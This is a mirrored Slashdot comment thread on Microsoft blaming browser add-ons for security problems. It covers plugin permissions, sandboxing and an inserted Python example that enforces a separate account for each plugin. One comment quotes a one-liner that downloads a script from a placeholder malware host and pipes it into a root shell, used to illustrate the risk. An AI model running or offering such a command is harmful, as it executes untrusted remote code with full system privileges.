Slashdot Mirror


Microsoft Blames Add-Ons For Browser Woes

darthcamaro writes "Running IE and been hacked? Don't blame Microsoft — at least that's what their security types are now arguing. 'One of the things we've seen in the last two years is that attackers aren't even going after the browser itself anymore,' Eric Lawrence, Security Program Manager on Microsoft's Internet Explorer team, said. 'The browser is becoming a harder target and there are many more browsers. So attackers are targeting add-ons.' This kinda makes sense since whether you're running IE, Firefox, Safari or Chrome you could still be at risk if there is a vulnerability in Flash, PDF, QuickTime or another popular add-on. Or does it?"

18 of 307 comments

  1. Duh by Drinking+Bleach · · Score: 5, Insightful

    Did anyone seriously believe Microsoft wouldn't try to make Internet Explorer look at least "not as bad as they say"?

    !news

  2. I'll still blame you for everything else. by retech · · Score: 5, Insightful

    Craptacular interface, ignoring standards, sluggish, bloated, lacking usable features... I'm sure I've missed some.

  3. Permissions by gurps_npc · · Score: 5, Insightful

    And if the add-ons were given far more permission than they actually need? If the browser works right, then the damage a poorly written add-on can do should be minimal.

    --
    excitingthingstodo.blogspot.com
    1. Re:Permissions by geirnord · · Score: 5, Insightful

      I second that! Somewhere along the line add-ons got way too many permissions. Why on earth does Adobe Flash have access to my webcam and hard drive?!?

    2. Re:Permissions by MadnessASAP · · Score: 4, Insightful

      Well, very few if any apps say they require root access unless they of course genuinely NEED root access, not even to install them. Whereas trying to use Windows outside of very carefully controlled office and school environments without Administrator access is impossible.

      --
      I may agree with what you say, but I will defend to the death your right to face the consequences of saying it.
    3. Re:Permissions by legirons · · Score: 3, Insightful

      IE7 is set to run in sandbox mode by default. If a user decides to take it out of that by force or installing addons, then I would gather they would be to blame directly or indirectly for the end result.

      Browser A: "would you like to give this plugin root access to your computer?" (note: if you click 'no' then you will be unable to watch the video you requested)

      Browser B: (plays the video, having done sufficient programming to ensure that it's safe, allows the video player to run with minimum permissions)

    4. Re:Permissions by SanityInAnarchy · · Score: 4, Insightful

      Just in case anyone was going to interpret this literally:

      Ideally, most of these plugins should be setuid as nobody

      No, no, a thousand times no!

      I suppose "nobody" was a clever concept, whenever it was invented. After all, with only one or two daemons using it, and with so few permissions, that was a reasonably smart move.

      These days, nobody is anything but -- since all the more lazily-developed (or lazily-admined) apps just use nobody for their unprivileged user, that means one app's nobody process can easily screw with another app's nobody process.

      The right solution would be to either run all plugins in some sort of completely managed, protected VM -- kind of like we do for Javascript -- or create a new Unix user per plugin.

      In fact, checking on my system, user ids are four bytes. That is, over four billion possible user ids. Granted, /etc/passwd is woefully ill-equipped to handle that many users -- but given a system which could, there's no reason I know of not to create a new Unix user per currently-visible object tag.

      But at the very least, I beg you, create a flash-plugin user, and a java-plugin user, etc. Please, please don't just use nobody. It's like people who programmatically look for a tag called 'foo:bar', instead of bothering to learn how XML namespaces actually work -- you're so close to understanding it, don't stop now!

      --
      Don't thank God, thank a doctor!
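      As an added illustration of the per-plugin-account argument above (example code written for this page, not from the original thread, from Slashdot, or from any browser or plugin vendor): the script below enforces the "one Unix user per plugin, never nobody" rule before launching a plugin helper process. It assumes a naming convention of one `<plugin>-plugin` account per plugin, uses a constructed passwd-style sample (the accounts flash-plugin, java-plugin and quicktime-plugin are hypothetical), rejects an account that shares its uid with nobody or anything else, and drops privileges in the usual groups-then-gid-then-uid order; the actual uid switch only works when run as root.

```python
import os
import pwd
import subprocess
from typing import Dict, Optional, Tuple

# Constructed passwd(5)-style sample, not a real system file. The accounts are
# hypothetical: flash-plugin and java-plugin are dedicated, quicktime-plugin is
# misconfigured to reuse nobody's uid, and pdf-plugin does not exist at all.
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
flash-plugin:x:10001:10001:Flash plugin sandbox:/nonexistent:/usr/sbin/nologin
java-plugin:x:10002:10002:Java plugin sandbox:/nonexistent:/usr/sbin/nologin
quicktime-plugin:x:65534:65534:QuickTime plugin (misconfigured):/nonexistent:/usr/sbin/nologin
"""

NOLOGIN_SHELLS = {"/usr/sbin/nologin", "/sbin/nologin", "/bin/false"}


def parse_passwd(text: str) -> Dict[str, dict]:
    """Parse passwd(5) lines into {name: {"uid", "gid", "shell"}}."""
    users = {}
    for line in text.splitlines():
        if not line.strip() or line.startswith("#"):
            continue
        name, _pw, uid, gid, _gecos, _home, shell = line.split(":")
        users[name] = {"uid": int(uid), "gid": int(gid), "shell": shell}
    return users


def plugin_account(plugin: str) -> str:
    """Naming convention assumed for this example: one '<plugin>-plugin' account per plugin."""
    return f"{plugin}-plugin"


def check_plugin_account(plugin: str, users: Dict[str, dict]) -> Tuple[bool, str]:
    """Verify the plugin has its own unprivileged, non-shared, non-interactive account."""
    name = plugin_account(plugin)
    entry = users.get(name)
    if entry is None:
        return False, f"no dedicated account {name!r}; refusing to fall back to nobody"
    if entry["uid"] == 0:
        return False, f"{name} is uid 0"
    # The uid must not be shared with any other account (nobody, another plugin, ...),
    # otherwise processes of the two can signal, ptrace or overwrite each other.
    sharers = sorted(n for n, e in users.items() if e["uid"] == entry["uid"] and n != name)
    if sharers:
        return False, f"{name} shares uid {entry['uid']} with {', '.join(sharers)}"
    if entry["shell"] not in NOLOGIN_SHELLS:
        return False, f"{name} has an interactive shell {entry['shell']}"
    return True, f"{name} ok (uid {entry['uid']})"


def _drop_to(uid: int, gid: int):
    """Build a preexec_fn that drops supplementary groups, then gid, then uid (order matters)."""
    def _pre():
        os.setgroups([])
        os.setgid(gid)
        os.setuid(uid)
        # A failed drop must abort the child rather than run it with the parent's rights.
        if os.getuid() != uid or os.geteuid() != uid:
            os._exit(111)
    return _pre


def spawn_plugin(plugin: str, argv: list, users: Optional[Dict[str, dict]] = None) -> subprocess.Popen:
    """Launch a plugin helper under its dedicated account; switching uid requires root."""
    if users is None:
        # On a real system, read the live account database instead of the sample.
        users = {p.pw_name: {"uid": p.pw_uid, "gid": p.pw_gid, "shell": p.pw_shell}
                 for p in pwd.getpwall()}
    ok, reason = check_plugin_account(plugin, users)
    if not ok:
        raise PermissionError(reason)
    entry = users[plugin_account(plugin)]
    return subprocess.Popen(argv, preexec_fn=_drop_to(entry["uid"], entry["gid"]))


if __name__ == "__main__":
    sample = parse_passwd(SAMPLE_PASSWD)
    for p in ("flash", "java", "quicktime", "pdf"):
        print(p, check_plugin_account(p, sample))
    if os.geteuid() == 0:
        # Only root can switch uid; on a host with a flash-plugin account this prints its id.
        try:
            spawn_plugin("flash", ["id"]).wait()
        except PermissionError as exc:
            print("not spawning:", exc)
```

      Run as an ordinary user it only reports the policy decision for each plugin; as root on a host where the dedicated account exists it launches the helper under that account. The uid-sharing check is what catches the "just use nobody" shortcut the comment warns about.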
  4. I've always said this. by bigstrat2003 · · Score: 4, Insightful

    The biggest part of internet security is paying attention to where you go. I used IE from the day I started using the internet until the day Chrome was released, and in those years, I got a virus/spyware exactly once: by stupidly going to a keygen site my friend suggested, which was full of malware. The rest of the time, I was fine.

    This isn't to say that the technology side should be ignored, but if people actually used their damn heads on the internet, it wouldn't matter much at all which browser they used.

    --
    "16MB (fuck off, MiB fascists)" - The Mighty Buzzard
    1. Re:I've always said this. by Sloppy · · Score: 5, Insightful

      The biggest part of internet security is paying attention to where you go.

      I would agree with you, if "going" to a malware site meant

      curl ftp://malwaresite.com/malware.sh | sudo bash

      Normally, that isn't the case, and "going" somewhere poses virtually no risk at all. There's one big exception, and the exception is so big and has so much marketshare, that people confuse that with normality.

      "Going to" a site or "opening" an email, doesn't mean "run someone else's code, and make sure to give it the same level of access that I have with a screwdriver."

      --
      As copyright owner of this comment, I authorize everyone to defeat any technological measure which limits access to it.
  5. But remember by dedazo · · Score: 5, Insightful

    If it's Firefox, it's perfectly OK to blame the add-ons.

    Those hundreds of memory leaks the FF team fixed in 3.0? All attributed to add-ons, until they were fixed.

    And don't get me wrong, FF is a far superior browser to IE any day of the week, but people in crystal rooms shouldn't be hurling stones at others. Or something along those lines.

    --
    Web2.0: I love when people Flickr my cuil and digg my boingboing until my google is reddit and I start to yahoo
  6. Bullshit. Plain utter bullshit. by syousef · · Score: 4, Insightful

    Many non-power-users don't use addons at all.

    If what was being said were true, only we techies would be affected. ...and if that were true no one would care (including us techies) because we know how to protect ourselves.

    --
    These posts express my own personal views, not those of my employer
    1. Re:Bullshit. Plain utter bullshit. by EvanED · · Score: 4, Insightful

      Many non-power-users don't use addons at all.

      And there are plenty more who install the Yahoo and Google toolbars, plus whatever other crap comes up.

    2. Re:Bullshit. Plain utter bullshit. by athakur999 · · Score: 4, Insightful

      Really? I don't think I've ever loaded up IE on a non-"power user" person's computer without seeing at least 2 or 3 "search toolbar" addons installed.

      If anything, I think "power users" are less likely to have random addons installed since they actually bother to uncheck the "install random crap toolbar" box when they install something.

      --
      "People that quote themselves in their signatures bother me" - athakur999
  7. Speaking of add-ons by Anonymous Coward · · Score: 5, Insightful

    Would an example of this include the Active X Control you have to install to be able to run Windows Update?

  8. Re:I think they have a point.. by Ethanol-fueled · · Score: 3, Insightful

    Finally!

    28 comments and the lowly AC is the first to mention Active X which still runs on IE, by the way, even though they added a UAC-style warning to the user before s/he runs the CraptiveX code.

    Proliferation of malware has shown time and time again that users simply keep clicking "allow" or "ok" without regard to what they're agreeing to run!

  9. Plugin model by Enderandrew · · Score: 4, Insightful

    Aren't they responsible for the plugin model in their browser? Aren't they responsible for the OS security?

    Take a look at how Chrome handles plugins and then try to pass the buck.

    --
    http://blindscribblings.com - Tasty pop-culture in conceptual fashion.
  10. It's still your damn fault by BlueParrot · · Score: 4, Insightful

    Now let's see... why is it that we need addons for something as simple as playing a video on YouTube or streaming sound? Oh yeah, that's right, there are no cross-platform open standards for doing so because SOMEBODY keeps failing to implement them. Seriously, even if the problem is buggy addons like Flash, the whole reason we need those addons is because Microsoft has kept sabotaging the open standards that would have made them redundant. If it were not for Microsoft's continued hampering of web standards, the majority of stuff Flash is currently being used for could easily have been implemented using just HTML and JavaScript. So blame the browser or blame the addons, it's still all your fault in the end.

  11. Re:I think they have a point.. by greg_barton · · Score: 4, Insightful

    Users are always the biggest security threat. It's the OS's job to protect them. OS X and Linux seem to have no problem doing this, so why can't Windows?